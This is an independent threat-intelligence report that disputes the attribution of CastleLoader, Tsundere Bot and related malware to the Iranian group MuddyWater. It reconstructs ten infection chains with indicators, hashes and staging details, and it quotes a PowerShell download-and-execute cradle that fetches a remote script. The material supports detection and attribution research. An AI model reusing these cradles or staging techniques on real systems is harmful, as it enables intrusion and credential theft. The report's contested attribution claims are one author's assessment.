| Subject | Seedworm / MuddyWater attribution of CastleLoader, DeonoRAT, CastleRAT, Tsundere Bot, and ClixFlare infrastructure |
|---|---|
| Assessment | Attribution is incorrect as stated — commodity MaaS misidentified as Iranian state capability |
| Confidence | HIGH |
| Last Updated | July 29, 2026 |
Tommy M — @ffforward
This is an independent, personal research publication. The analysis, findings, and opinions expressed are solely my own and do not represent the views, positions, or endorsement of my employer or any organization I am affiliated with. This work was conducted independently, on my own time, and has not been reviewed, approved, or sponsored by my employer.
This all started while working with the infosec community to document an undocumented ClickFix chain that had been running for over six months without proper public documentation — built around a C2 panel called ClixFlare. I noticed the chain commonly led to CastleLoader MSIs, and while investigating that infrastructure, I suddenly found myself in the midst of supposedly Iranian APT activity.
The reason: one of the ClixFlare PowerShell staging servers I was investigating, hxxps://iuumfgrrnuhb[.]zhivachkapro[.]com/pobor, turned out to be the first IOC listed in Cisco Talos's blog on Seedworm a.k.a. MuddyWater, published in connection with the current Iran crisis.
ClickFix and ClixFlare had to wait. This would go deep.
In March 2026, Symantec/Broadcom published a threat intelligence report attributing a cluster of intrusion activity targeting U.S. banks, airports, software firms, and Canadian non-profits to Seedworm/MuddyWater, an Iranian MOIS cyber espionage unit [1]. Over the following months, this attribution was echoed and expanded by Cisco Talos [2], Check Point [3], Rapid7 [4], CyberProof [5], and JUMPSEC [6] — creating an industry consensus that four malware pillars ("Dindoor", "Fakeset", Stagecomp/Darkcomp, and Tsundere Bot) represented active Iranian state capability.
This document tests the vendor thesis against ground-truth forensic evidence across 10 reconstructed attack chains, and finds zero technical APT indicators in nine of them.
Symantec found two malware families on the networks of a U.S. bank, airport, software company (Israeli operations), and a Canadian non-profit, and grounded the Seedworm attribution in a single certificate-reuse argument:
"The Donald Gay certificate has been used previously to sign malware linked to Seedworm… The Stagecomp and the Darkcomp malware have been linked to Seedworm by vendors including Google, Microsoft and Kaspersky. While this malware wasn't seen on the targeted networks, the use of the same certificates suggests the same actor — namely Seedworm — was behind the activity." — Symantec [1]
The Core Research Question: Does empirical binary analysis, C2 telemetry, and infrastructure profiling support this state-sponsored attribution, or did vendors launder commercial cybercrime MaaS into Iranian state lore? The following sections test the vendor thesis against ground-truth forensic evidence across 10 reconstructed attack chains.
The entire March 2026 Seedworm attribution hangs on a single foundational assertion: that the "Donald Gay" certificate previously signed Stagecomp and Darkcomp, which Symantec claims "have been linked to Seedworm by vendors including Google, Microsoft and Kaspersky." A rigorous audit of this claim reveals it appears to be unsupported by any independently verifiable source.
Trojan.Stagecomp and Trojan.Darkcomp are Broadcom/Symantec proprietary detection names — no other vendor tracks malware under these names. The Stagecomp/Darkcomp → Seedworm link that Symantec cites as prior art from "Google, Microsoft and Kaspersky" cannot be independently located or verified in any of those vendors' published research.
Deconstructing the four pillars of vendor attribution reveals that every cited indicator belongs to commercial Malware-as-a-Service (MaaS) and retail cybercrime. What follows is not four isolated technical notes but four independent confirmations of the same underlying pattern: proprietary detection names created the illusion of distinct APT toolsets, when in fact each "family" is a component of commodity crimeware sold to any paying customer.
Trojan.Dindoor is simply Symantec's proprietary name for the Deno-based staging build of CastleLoader (TAG-150) and its detonation artifacts. CastleLoader is a well-documented commercial MaaS platform independently tracked by Recorded Future, eSentire, and PRODAFT, and sold to dozens of paying cybercrime affiliates and ransomware operators worldwide — meaning Symantec attributed a rental product to a single state actor.
This pillar most clearly exposes the absurdity of the state-sponsorship claim. Trojan.Fakeset is not a bespoke espionage implant — it is a sprawling, retail-grade SEO and malvertising operation, distributing portable Python loaders through public Backblaze B2 buckets registered under whimsical, teenage-coded names: gitempire, elvenforest, oceanhub, and sailormercuryfam.
These buckets hosted trojanized installers for ordinary consumer and professional software — Blender 3D, ProCore, HWMonitor — the kind of tools an engineer or hobbyist would search for and download in seconds. Vendors captured only a tiny slice of this ecosystem, anchored entirely to two commercially-purchased MSaaS code-signing certificates issued to "Amy Cherne" and "Donald Gay." The real campaign is vastly larger, spanning C2 domains including maybedontbanplease[.]com, mazafakaerindahouse[.]info, and mofa****gas[.]info.
Ground-truth URL telemetry for Trojan.Fakeset samples confirms they were downloaded from open Backblaze B2 buckets (gitempire.s3, elvenforest.s3) hosting fake HWMonitor, Notion, Obsidian, Blender, and SketchUp installers. When executed, these portable Python loaders drop pythonw.exe and call home to juvenile edgelord C2 domains — naming conventions of a bored teenager running a malvertising side-hustle, not a signals-intelligence directorate. It is precisely the kind of detail vendors omitted from their public IOC tables, publishing SHA-256 hashes while quietly leaving the domain names out of the report.
A separately observed installer script associated with the sedaliarealty[.]net cluster — part of the same Fakeset SEO malvertising ecosystem — reveals an evolutionary tradecraft leap: rather than deploying portable CPython, the affiliate abuses IronPython running on the .NET Common Language Runtime, downloading the IronPython release directly from the official GitHub repository and using a UTF-32-padded Base64 payload to evade YARA string scrapers — a technique optimized for evading Python-signature detections, not a hallmark of nation-state tradecraft.
Pivoting on the custom HTTP backend's hardcoded JSON 404 signature ({"code":404,"success":false,"message":"File not found"}) — unique to the Fakeset delivery infrastructure — across URLScan, Censys, and Shodan retrieves an unbroken 12-month historical record of every C2 server operated by this single affiliate, spanning three evolutionary phases from standard /service/download/ staging, to UUID-segmented Python dropper paths (the exact window Symantec captured as "Fakeset"), to the current phase of throwaway edgelord domains. Every domain across all 61 historical records shares the identical JSON error signature and the same bulletproof/reseller ASN hosting profile (Servinga, Eonix, Scalaxy, Latitude.sh) — a signature of one ongoing retail malvertising operation, not intermittent state tasking.
Trojan.Stagecomp and Trojan.Darkcomp are simplistic, amateur C++ loader and RAT binaries compiled for a short-lived QuickAssist/Teams initial-access-broker (IAB) campaign. Only two hashes of each malware family have ever been publicly recovered — a vanishingly small sample size on which to anchor an entire nation-state attribution. One sample, ms_upd.exe, was hosted on 172.86.126.208 — the exact same server hosting an amateur Coinbase real-time OTP-intercepting crypto-draining kit (stats-coinbase[.]com, "tryanotherway" kit), placing supposed Iranian state malware on shared infrastructure with retail crypto-theft tooling.
Tsundere Bot is a Node.js loader using EtherHiding (blockchain-based C2 resolution), and it contains explicit Russian-language developer error strings — "❌ Ни один RPC провайдер не вернул валидный IP" ("Not a single RPC provider returned a valid IP"). Its only vendor tie-in to the broader case was an exposed Python SimpleHTTP staging server (terymar[.]com) hosting Spf.ps1 and reset.ps1 alongside CastleLoader MSIs and AnyDesk — a configuration matching exactly what commercial Pay-Per-Install (PPI) botnets like Amadey and GCleaner distribute to any paying affiliate.
From the IOCs shared across all vendor reports, we reconstructed 10 distinct attack chains. Full technical detail for each chain (hashes, VBS/PS1 filenames, byte counts, JWT payloads) is preserved in 7b. Deep Technical Evidence & Historical Precedent
Appendix A for independent verification.
| Chain | Stages Analyzed | APT Indicators Found | Basis of Vendor Attribution |
|---|---|---|---|
| 1 — ClixFlare → clickzpaqkvba | 4 stages | ❌ Zero | Symantec: Trojan.Dindoor label [2] |
| 2 — ClixFlare → Kilo52 | 4 stages | ❌ Zero | Symantec: Trojan.Dindoor label |
| 3 — coupon.hub.v1 | 3 stages | ❌ Zero | Symantec: Trojan.Dindoor label; JWT matches JUMPSEC's chain |
| 4 — Serial | 3 stages | ❌ Zero | Symantec: Trojan.Dindoor label |
| 5 — eSentire ITW | 6 stages | ❌ Zero | eSentire: no APT attribution; Symantec: Trojan.Dindoor label |
| 6 — QuickAssist/terymar | 4 artifacts | ❌ Zero | Talos: echoed Symantec's label [2] |
| 7 — Stagecomp/Darkcomp | 3 stages | ⚠️ Certificate only | "Donald Gay" cert → uncitable prior Seedworm link |
| 8 — GCleaner/Amadey → CastleLoader/Smokest120 | 6 stages / 12 hashes | ❌ Zero | JUMPSEC / vx-underground / BitSight: commodity Amadey distribution (Jan 2026); no APT attribution |
| 9 — PsExec SEO | 3 stages | ❌ Zero | AV signature: Trojan.MuddyWater.10 |
| 10 — CyberProof Teams / update_ms | 3 stages | ❌ Zero | CyberProof: "Seedworm Teams Campaign" (July 2026); inherits Symantec label |
Conclusion: Across 10 reconstructed chains covering 35+ stages and artifacts, the only technical APT indicator is a code-signing certificate purchasable from criminal MSaaS vendors ($5k–$9k via Fox Tempest). Every other attribution claim is vendor label inheritance — Symantec named the tool, and downstream threat intelligence feeds cascaded the attribution without empirical verification.
Because vendors discovered TAG-150's modular framework independently across different staging runtimes (Deno, Python, Node.js), they assigned conflicting proprietary names to the same underlying components:
| TAG-150 Stage | Recorded Future / JUMPSEC / ThreatDown | Symantec / Broadcom | eSentire |
|---|---|---|---|
| Stage 1 Stager (Deno JS eval-loop / WiX MSI) | CastleLoader / CastleBot | Dindoor | DinDoor / DenoRAT [17] |
| Stage 2 Core RAT (Python / C++ PE stealer) | CastleRAT | Fakeset | NightshadeC2 [8] |
| EtherHiding Stager (Node.js + Smart Contract C2) | ChainShell [6] | — | Tsundere Bot [16] |
Following Symantec's March 5, 2026 report, multiple vendors echoed and expanded the attribution, creating a circular feedback loop:
In-the-wild telemetry confirms ms_upd.exe was hosted on the same Cloudzy VPS server (172.86.126.208) that concurrently ran a live-panel Coinbase/Ledger crypto-draining kit. Rapid7's "Iranian state false flag" was simply a financially motivated ecrime affiliate running tech-support scams, crypto drainers, and Chaos ransomware on cheap VPS infrastructure.
Beyond the general pattern of vendor label inheritance, three specific documented episodes reveal the exact mechanics by which commodity ecrime artifacts were laundered into "Seedworm" lore.
Unpacked process memory disassembly reveals that "SmokestEdge120" evolved into "VirtualSmokestGuy120" as internal scheduled task monikers. JUMPSEC cited "Amy Cherne -> Smokest JWT -> VirtualSmokestGuy" as their primary attribution chain. However, every link in that chain is a commodity ecrime artifact: "Amy Cherne" is an Azure MSaaS certificate receipt, "Smokest" is an Amadey/TopWebComics affiliate tag, and "VirtualSmokestGuy120" is simply a scheduled task string. Independent researchers, including Simon Kenin (@k3yp0d, "The water is so muddy that you can't see..."), confirmed that treating "Smokest" as an Iranian APT family was a complete analytical misinterpretation [7].
Symantec's follow-up report on May 12, 2026 ("Seedworm Electronics Campaign", Reference [15]) contains three fundamental analytical errors:
node.exe — pre-dating their own March 5 blog — and declared Node.js/Deno to be "tactical shifts by Seedworm." In reality, Symantec confused CastleLoader (DenoRAT) with Tsundere Bot (portable node.exe) — two separate commercial MaaS tools rented by unrelated commodity affiliates.lpu.dll was executed via powershell iex ... DownloadString('https://timetrakr[.]cloud/sp.ps1'), conflating two unrelated artifacts: sp.ps1 (a PowerShell screenshot script) and lpu.dll (a PE DLL actually executed via rundll32 lpu.dll, main).d5879598... (lpu.dll) calls CredUIPromptForWindowsCredentialsW to write credentials to C:\ProgramData\lopa.txt. Five paragraphs later, the same report claimed Group-IB's research "did not pin down what the binary does" — directly contradicting their own opening analysis.Group-IB's February 2026 report ("Operation Olalampo", Reference [13]) encapsulates how open-directory scraping created a circular attribution loop. Group-IB discovered a Python SimpleHTTP/0.6 open directory containing a mix of active QuickAssist scam tools (lpu.exe, lpu.dll, reset.ps1), commercial remote-monitoring tools (AnyDesk, resocks), and legacy artifacts (FMAPP.dll, chrome_inject.exe).
The subsequent vendor lineage shows a clean chain of escalating certainty with no additional evidence added at each step:
Independent research from Ctrl-Alt-Intel (March 4, 2026) [7] and Group-IB (February 2026) [13] documents what genuine MuddyWater state espionage operations actually look like, in stark contrast to the commodity crimeware attributed here.
| Attribute | Real MuddyWater Operations (Ctrl-Alt-Intel / Group-IB) | Symantec "Seedworm" Attribution |
|---|---|---|
| Delivery Vector | Macro-based spearphishing, Fortinet CVE exploitation | SEO-poisoning malvertising, ClickFix, Teams/QuickAssist lures |
| Malware Suite | Custom: GhostFetch, GhostBackDoor, KeyC2, PersianC2, CHAR | Commodity MaaS: CastleLoader, DenoRAT, NightshadeC2, Tsundere Bot |
| C2 Infrastructure | Custom Flask/Python backends, Telegram bots, dedicated IPs | Multi-tenant MaaS endpoints (serialmenot[.]com, terymar[.]com) |
| Language/Artifacts | Persian keyboard mappings, Farsi source strings | Russian developer strings, CIS exclusions |
| Targeting | MENA government, aviation, telecom, healthcare (Israel, UAE, Jordan) | Broad global consumer & enterprise targets via mass ClickFix/SEO |
Beyond the chain reconstructions and case studies, several additional pieces of evidence independently corroborate the commodity-MaaS thesis and directly preempt the strongest counter-argument: that Iranian state actors could simply be using commodity tools rather than developing them.
An unanalyzed VirusTotal Intelligence sample of the DenoRAT C2 JavaScript module (a2183b4d..., 715.80 KB) carries only a 6/61 detection score. Four Western AV vendors (Avast, AVG, Avira, WithSecure) blindly flag it as JS:Muddywater-A via signature inheritance from Symantec's attribution post. Kaspersky, however, detects its actual functional nature: HEUR:Trojan-PSW.Script.Disco.gen — a password-stealing-ware and Discord/credential-stealer classification, with no APT designation whatsoever.
Deobfuscating this sample (46,486 AST transformations, 12,033 decoded strings) empirically validates Kaspersky's heuristic and reveals the RAT's true architecture: native Windows DPAPI decryption via Deno's FFI (CryptUnprotectData against Chromium login/cookie databases), a credential and crypto harvesting engine targeting 58 browser extension IDs, Discord tokens, Telegram sessions, and 19 desktop/browser crypto wallet families, plus a bidirectional WebSocket C2 for interactive PowerShell execution.
vx-underground's January 2026 analysis expressed confusion at finding an Amadey botnet panel on the same server hosting a sophisticated polymorphic JS payload, noting it would be "unusual... for an obfuscated polymorphic multi-staged Javascript payload to deliver Amadey." Empirical reconstruction resolves the paradox by reversing the assumed direction: Amadey Bot was the parent PPI stage (dropped via Nullmixer/GCleaner), and Amadey's C2 tasked infected hosts to download the CastleLoader MSI and CastleRAT payloads as secondary tooling — not the other way around. The JWT embedded in the MSI (userNote: "topwebcomics") directly matches the web-comic lure vx-underground identified.
eSentire's foundational report, "New Botnet Emerges from the Shadows: NightshadeC2" (published six months before Symantec's Iranian attribution), documented an earlier .NET/PowerShell CastleLoader build distributing NightshadeC2 and Lumma Stealer via commodity ClickFix landing pages and trojanized SEO software (CCleaner, Advanced IP Scanner, Express VPN). The report documented a Steam Community dead-drop C2 resolver, a SilentCleanup LOLBin UAC bypass, hidden HVNC browser sessions, and classic ClickFix PowerShell cradles — with zero Iranian APT attribution, proving CastleLoader was a thriving commodity affiliate loader long before Symantec rebranded it as "Dindoor."
A separately documented interactive AnyRun sandbox session from researcher JAMESWT (August 22, 2025) captured the operator taking manual control upon realizing they were in a sandbox, typing the taunt "are you dump?!" in Notepad and rage-deleting desktop icons before disconnecting. State-sponsored intelligence operatives conducting espionage do not behave this way — it is the unmistakable signature of a commodity cybercrime affiliate.
Iranian threat actors purchasing and deploying commodity Russian-developed malware is a documented historical pattern — but genuine cases show a clear division between purchased collection tools and custom-built components, unlike the Seedworm attribution where no custom component has ever been recovered.
| Campaign | Iranian Actor | Commodity Tool (Russian) | Certificate | Custom Tool (Genuinely Iranian) |
|---|---|---|---|---|
| F5UPDATER (2023) | Handala | Rhadamanthys (Asgard Protector) | "Skytec Global Ltd" (purchased, revoked) | Hatef wiper |
| INCD impersonation (Mar 2026) | Handala | Rhadamanthys (Asgard Protector) | Non-reused Cloudflare domains | Wiper |
| Ctrl-Alt-Intel server (Mar 2026) | MuddyWater | Tsundere Bot / ChainShell (TAG-150) | "Amy Cherne" / "Donald Gay" (purchased) | KeyC2, PersianC2 |
| CastleRAT MaaS (2025–2026) | Attributed to MuddyWater | CastleRAT, Stagecomp/Darkcomp (TAG-150) | "Amy Cherne" / "Donald Gay" (purchased) | None identified |
The consistent pattern in genuine cases: Iranian actors purchase commodity Russian malware for collection capabilities and purchase code-signing certificates from criminal MSaaS vendors, but their custom tools (wipers, Farsi-language C2 frameworks) remain separate and identifiable. The Seedworm/CastleRAT case is the outlier — it has a purchased certificate and commodity tooling, but conspicuously no custom Iranian-attributable component has ever been recovered, which is precisely what distinguishes genuine consumption from mistaken attribution.
Full technical staging detail for all 10 chains, reproduced in complete forensic depth for independent verification.
Vendors involved: Symantec [1], Cisco Talos [2], ThreatDown [10], Hunt.io [19]
Delivery domain zhivachkapro[.]com uses triple-layer obfuscation (garbage variable padding → reversed Base64 → reversed UTF-8 → iex), deobfuscating to a 3-line downloader that fetches clickzpaqkvba.msi (hash bd8203ab88983bc081545ff325f39e9c5cd5eb6a99d04ae2a6cf862535c9829a, ~23 KB, author Delta_daemon99, created 2026-02-02) and silently installs via msiexec /qn. This establishes HKCU\...\Run\Victor_script56 running wscript.exe november_block25.vbs, which launches PowerShell bootstrap charlie_script48.ps1 (3,181 bytes). The bootstrap checks for deno.exe, downloads it from deno.land if absent, binds TCP mutex 10044, and polls serialmenot[.]com/mv2/<JWT>/<id>. The extracted JWT reveals campaignId: "75cbe18653d52372", campaignName: "Smokest", userId: "bb47c0615477a877", userNote: "BatClickFix" — the same affiliate identity used in the TopWebComics Amadey distribution campaign (Jan 2026).
Vendors involved: Symantec [1], Cisco Talos [2], ThreatDown [10], Hunt.io [19], CyberProof [5]
Same /pobor delivery cradle from zhivachkapro[.]com, this time invoking 7467f326677a4a2c8576e71a832e297e794ea00e9b67c4fcbe78b5aec697cec4.msi ("Kilo52.msi", ~23 KB, author Kilo52, created 2026-02-18). Drops zulu_worker10.vbs which runs charlie53.ps1, polling serialmenot[.]com/mv2/<JWT>/<id>. JWT reveals identical campaignId: "75cbe18653d52372", campaignName: "Smokest", userId: "bb47c0615477a877", userNote: "BatClickFix" as Chain 1.
Vendors involved: Symantec [1]
Coupon-lure MSI 0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542 (1.08 MB) is padded with an inert dummy file (Viper_widget65.dat). Author alpha_tool27, created 2026-02-13. Establishes HKCU\...\Run\Romeo60 running wscript.exe Viper_controller36.vbs → tango_utility84.ps1, polling serialmenot[.]com/mv2/<JWT>/<id>. JWT: campaignId: "75cbe18653d52372", campaignName: "Smokest", userId: "bb47c0615477a877", userNote: "ADS" — matching the same campaignId and userId that JUMPSEC uses as its primary MuddyWater attribution chain, but here explicitly tagged as ad-distribution/SEO lure delivery by the same commercial affiliate.
Vendors involved: Symantec [1], Check Point [3]
MSI 1d984d4b2b508b56a77c9a567fb7a50c858e672d56e8cf7677a1fca5c98c95d1 (22.5 KB, author echo_tool89, subject "Serial", created 2026-02-01) establishes persistence via wscript.exe Lynx_system59.vbs, running b0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0 (named python85.ps1 as a decoy filename, despite containing zero Python code — it fetches deno.exe and executes Deno JavaScript). Polls serialmenot[.]com/mv2/<JWT>/<id>: campaignId: "6b357c4222050506", campaignName: "test", userId: "dea1196d5d4ab8d6" — a separate customer identity from Chains 1–3, indicating a developer or QA testing account. Cross-campaign code identity to Chain 8 proven via webcrack AST comparison.
Vendors involved: eSentire [8], ThreatDown [10], Hunt.io [19]
MSI 822ce21c572ac062ff55da8c94132f506af04ff919bf8f3bda848840076743b0 (12.8 KB, author echo_client41, subject "Mike51", created 2026-06-03) delivered via zclzgjjqewlzm1.msi from columbnezhjdq[.]com. Uses explorer.exe "[INSTALLFOLDER]\november85.cmd" instead of wscript.exe to break parent-child process tree detections, then runs Griffin20.ps1 which uses winget install --id DenoLand.Deno or scoop install deno instead of direct download. The server compiles launcher scripts on demand at webstizkgao[.]com/v02<BUILD_ID>.js — a tiny eval-loop fetching launcher-2, which sets up autorun and runs main via Deno.listen. Final payload is NightshadeC2, a native C++ PE backdoor using PEB_LDR_DATA evasion via /service/ HTTP C2, also dropping NetSupport/WarmCookie. Window class "IsabellaWine" matches the same TAG-150 MaaS template across unrelated builds.
Vendors involved: Cisco Talos [2] ("Seedworm"), Blackpoint Cyber [14] (no APT attribution), Symantec [1] (May 2026)
Serial.msi (23a0a9b0755e052966b1e9e6137334444494c250afcf9f4a7e18c650cf2f4078) downloaded from terymar[.]com/install/Serial.msi (22.5 KB, author echo89, subject "oko", created 2026-02-03 22:14:10 UTC). Establishes HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Oscar15 running wscript.exe falcon13.vbs (445 bytes) → PowerShell bootstrap eagle_package6.ps1 (3,153 bytes). AV detections include Trojan:JS/MuddyWater.DC!ams, PowerShell/Agent.MOIS!tr, Backdoor.PS1.DINDOOR.SMTHA. JWT reveals campaignId: "6b357c4222050506", campaignName: "test", userId: "dea1196d5d4ab8d6", userNote: "Oko", proxies http://okobojirent.com — carrying the exact same customer userId and campaignId as commodity QuickAssist scams deployed elsewhere. Separately, terymar[.]com/install/Spf.ps1 delivers Tsundere Bot: Node.js with ethers@6.13.2, using EtherHiding C2 to query Ethereum contract 0x2B77671cfEE4D5EE6652E63bc9776A2EaFdbb7ee, resolving ws://185.236.25.119:3001. Additionally, lpu.dll (also known as QMAlgnkMX5.dll, hash d587959841a763669279ad831b8f0379f6a7b037dffc19deab5d41f37f8b5ffc) is delivered via bitsadmin.exe and executed via rundll32.exe lpu.dll, main during active QuickAssist tech-support sessions, calling CredUIPromptForWindowsCredentialsW to write harvested credentials to C:\ProgramData\lopa.txt. The staging server rotated through terymar[.]com (Feb 5), wa.opt7dev[.]com (Feb 24 + Mar 3), and steuerberaterbarcelona[.]com (Mar 12); wa.opt7dev[.]com also hosted cv.msi, a fake-resume Tsundere Bot deployment node.
Vendors involved: Symantec [1], Check Point [3], Rapid7 [4], Unattributed researcher (Jan 2026)
Stagecomp loader ms_upd.exe (24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14) signed with the "Donald Gay" certificate (thumbprint B674578D4BDB24CD58BF2DC884EAA658B7AA250C), also observed as DIDS.exe (a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0). Downloads Darkcomp (Game.exe / WebView2.exe, hashes 3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 and 1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6) from moonzonet[.]com and uploadfiler[.]com. In Rapid7's telemetry, this same infrastructure deployed Chaos ransomware. Critically, ms_upd.exe was hosted on 172.86.126.208:443 — the exact same Cloudzy VPS server that concurrently ran a live-panel Coinbase/Ledger OTP-intercepting crypto-drainer kit (stats-coinbase[.]com, "tryanotherway" kit, logger.js).
Vendors involved: JUMPSEC [6], BitSight, Abuse.ch, vx-underground
GCleaner PPI distribution (campaign "mixeleven", Jan 12, 2026, delivered via Integrator_Portable.exe) tasks Amadey Bot v3.89 (C2 158.94.208[.]6/h8jfdmdWS/index.php, cc=RU). Amadey downloads secondary MSIs from sharecodepro[.]com — including MSI 13d2d0b4e4709d0f7705a7519ad099b10b0680ac6c40b96b74ee082ca4d93a6f (author "Mike62") and 85cd7a1e24ec449c9bf5f86ffccfa2fb8a684f240ae0e3b492839b4277e59080 (author "quebec_service65"), both flagged Trojan.Dindoor. A separate CastleLoader VBScript path drops Crypt1.ps1 from sharecodepro[.]com, which downloads both Petuhon.zip (a legitimate Python 3.9 Embed package — Russian slang "Петухон") and Smokest120.zip (obfuscated CastleRAT Build 120) from the same IP, 172.86.123.222 — direct evidence that Amadey Bot and DenoRAT execute identical PowerShell cradles for A/B testing across delivery vectors. The CastleRAT payload Smokest.jpg (3,823,807 bytes) is a custom byte-sandwich container: bytes 0–598,355 form a legitimate renderable JPEG ending at a genuine EOI marker (FF D9); bytes 598,357–3,823,805 contain the encrypted CastleRAT payload; a trailing fake EOI marker is appended so AV/EDR magic-byte validators classify the 3.82 MB file as a benign image. Unpacked process memory triggers the Yara signature for the same payload family, confirming a C2 at 23.94.145.120:9999.
Vendors involved: VirusTotal AV signatures only (no vendor report)
Fake PsExec installer archive drops PsExec.msi (576e998f55004774fb72164d791e10d9546d987f72f701ccdac8dc2e109c31a4, ~23 KB standard build), detected under generic Trojan.MuddyWater.10 / Backdoor.PS1.DINDOOR AV signatures. Drops the identical b0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0 ("python85.ps1" decoy filename, zero actual Python code) seen in Chain 4, sharing the same campaignName: "test" and userId: dea1196d5d4ab8d6 — the recurrence of this exact decoy-filename payload across disparate lure campaigns supports commodity affiliate distribution rather than targeted nation-state activity.
Vendors involved: CyberProof [5] ("Seedworm Teams Campaign", July 2026)
update_ms.msi (500ee77471669175b359bf57384291cab791200191d0e5a5bb190da53ccb30ee, 48.29 MB, author "Python78", subject "lima93", built via Linux msitools 0.106 on 2026-03-04, signed with the revoked "Anquesia Gray" certificate under Microsoft ID Verified CS EOC CA 01) bundles its own 122.7 MB deno.exe binary to bypass outbound deno.land web filter downloads. Establishes HKCU\Software\Microsoft\Windows\CurrentVersion\Run\alpha_client95 running wscript.exe Falcon_module63.vbs → tango13.ps1, binding TCP mutex 10091 and polling direct IP C2 http://140.82.18.48/health. JWT reveals buildId: "2bb76a4e96ee2312", buildNote: "123", buildType: "msi", userId: "eb97f1098d1fa9d8", userNote: "BrakeDigital". CyberProof's attribution to Seedworm relies entirely on Symantec's umbrella reporting, with no independently verified state-actor indicator.
| Field | "Donald Gay" | "Amy Cherne" | "Anquesia Gray" |
|---|---|---|---|
| Issuer | Microsoft ID Verified CS AOC CA 02 | Microsoft ID Verified CS AOC CA 02 | Microsoft ID Verified CS EOC CA 01 |
| Thumbprint | B674578D4BDB24CD58BF2DC884EAA658B7AA250C | 0902D7915A19975817EC1CCB0F2F6714AED19638 | 6C841AF762A2D0234616BC1B8EB572BB3BC60944 |
| Serial | 3300079A51C7063E66053D229B000000079A51 | 330007F1068F41BF0F662A03B500000007F106 | 3300073CFFF3E87A68E1439541000000073CFF |
| Status | Revoked (time-invalid) | Revoked (time-invalid) | Revoked by Issuer |
| Signs | Stagecomp, Darkcomp, Fakeset, Dindoor | Fakeset, Dindoor | Bundled-Deno CastleLoader (update_ms.msi) |
| Counter-evidence | Fox Tempest MSaaS sells certs for $5k–$9k [9] | Same | Same |
Certificates issued to Amy Cherne, Donald Gay, Anquesia Gray, Slims Software, and Zeebodem Agro were all issued under Microsoft Azure Trusted Signing. Criminal MSaaS vendor Fox Tempest sells these ID-verified Azure code-signing accounts, generated from mule identities, for $5k–$9k. Overlapping certificates prove only that affiliates bought accounts from the same underground sellers.
| SHA-256 Hash | True Forensic Classification & Description | Report Origin(s) |
|---|---|---|
052e9951...883f | PyArmor 9.1.9 Runtime Engine (pyarmor_runtime.pyd, 633,856 bytes) | [6],[20] |
067703b4...7094 | CastleLoader Deno Bootstrap VBScript (juliet_worker37.vbs, 933,377 bytes) | [6],[20] |
077ab28d...52de | Python Dropper/Loader (Trojan.Fakeset, signed by Amy Cherne cert; C2 mofa****gas[.]info) | [1],[2] |
0bd1d24e...fdba | Amadey Bot (Donut-encrypted packed loader, "mixeleven" campaign) | [6],[20] |
0f9cf1cf...d542 | CastleLoader WiX MSI (1.08 MB, padded; Chain 3) | [1],[2] |
1319d474...f97b6 | Darkcomp PE RAT (Game.exe; C2 moonzonet[.]com; Chain 7) | [1],[4] |
13d2d0b4...4a93a6f | CastleLoader WiX MSI (1be6c5708790fbc7.msi; Amadey task) | [6],[20] |
1fd01d13...4f02 | CastleRAT Stager Script (jam.ps1; downloads Petuhon.zip & Smokest120.zip) | [6],[20] |
24857fe8...4d14 | Stagecomp PE Loader (ms_upd.exe, "Donald Gay" cert; hosted with stats-coinbase[.]com) | [1],[4] |
29b777e7...062c8 | Tsundere Bot PowerShell Cradle (Spf.ps1; QuickAssist lures; Chain 6) | [2],[14] |
2a09bbb3...23a5 | CastleLoader WiX MSI (Serial.msi; Donald Gay cert; Chain 4) | [1],[2],[14] |
3dcb5e15...4354 | Amadey Bot Core Executable (C2 158.94.208[.]6) | [6],[20] |
4a2594b7...cfb2 | Tsundere Bot PowerShell Package (eagle_package6.ps1; VT 16/61; Chain 6) | [14] |
4ba0d3ae...c31 | CastleLoader NSIS Dropper (signed SERPENTINE SOLAR LIMITED; C2 maybedontbanplease[.]com) | SOC/Analyst |
500ee774...30ee | Bundled-Deno CastleLoader MSI (update_ms.msi, 48.29 MB; Chain 10) | [5] |
576e998f...31a4 | CastleLoader WiX MSI (PsExec.msi; SEO malvertising; Chain 8) | AV Signatures |
5f8347ee...136a | Stage 2 JavaScript RAT (polymorphic variant) | [10],[17] |
7467f326...ec4 | CastleLoader WiX MSI (Kilo52.msi; "Smokest" campaign; Chain 2) | [1],[2],[10],[5],[19] |
822ce21c...43b0 | CastleLoader WiX MSI (zclzgjjqewlzm1.msi; June 2026 build; Chain 5) | [1],[17] |
934a3c42...7f0a | CastleRAT Build 120 Payload Archive (Smokest120.zip) | [6],[20] |
a92d28f1...ecc0 | Stagecomp PE Loader (DIDS.exe, "Donald Gay" cert; Chain 7) | [1],[4],[2] |
b0af82de...931a0 | CastleLoader Deno Bootstrap Script (python85.ps1; "test" campaign; Chains 4 & 8) | [1],AV Sigs,[2] |
bd8203ab...829a | CastleLoader WiX MSI (clickzpaqkvba.msi; Chain 1) | [1],[2],[10],[19] |
c1e0a054...87a00 | NightshadeC2 Native Backdoor (Chain 5) | [17] |
d5879598...5ffc | Commodity Credential Harvester (lpu.dll; Chain 6) | [2],[14] |
f6954b64...326d34 | Legitimate Python 3.9.5 Embed Package (Petuhon.zip) | [6],[20] |
Full 40+ entry hash table available on request; representative selection shown above covering all 10 chains.
| Indicator/Artifact | True Infrastructure Classification & Function | Report Origin(s) |
|---|---|---|
serialmenot[.]com | CastleLoader / Stage 2 JS RAT C2 Server (primary Deno REST endpoint) | [1],[2],[10],[5],[19] |
zhivachkapro[.]com | ClixFlare ClickFix IAB Delivery Domain (Russian linguistic provenance) | [2],[10] |
terymar[.]com | Commodity Staging Server (CastleLoader + Tsundere Bot; QuickAssist scams; Chain 6) | [2],[14] |
sharecodepro[.]com | Commodity Payload Delivery Server (Amadey tasks) | [6],[20] |
moonzonet[.]com | Darkcomp PE RAT C2 Server | [1],[2],[4] |
okobojirent[.]com | DenoRAT / CastleLoader C2 Server | [14],[19] |
webstizkgao[.]com | CastleLoader / DenoRAT C2 Server (server-compiled eval-loops; Chain 5) | [17],[19] |
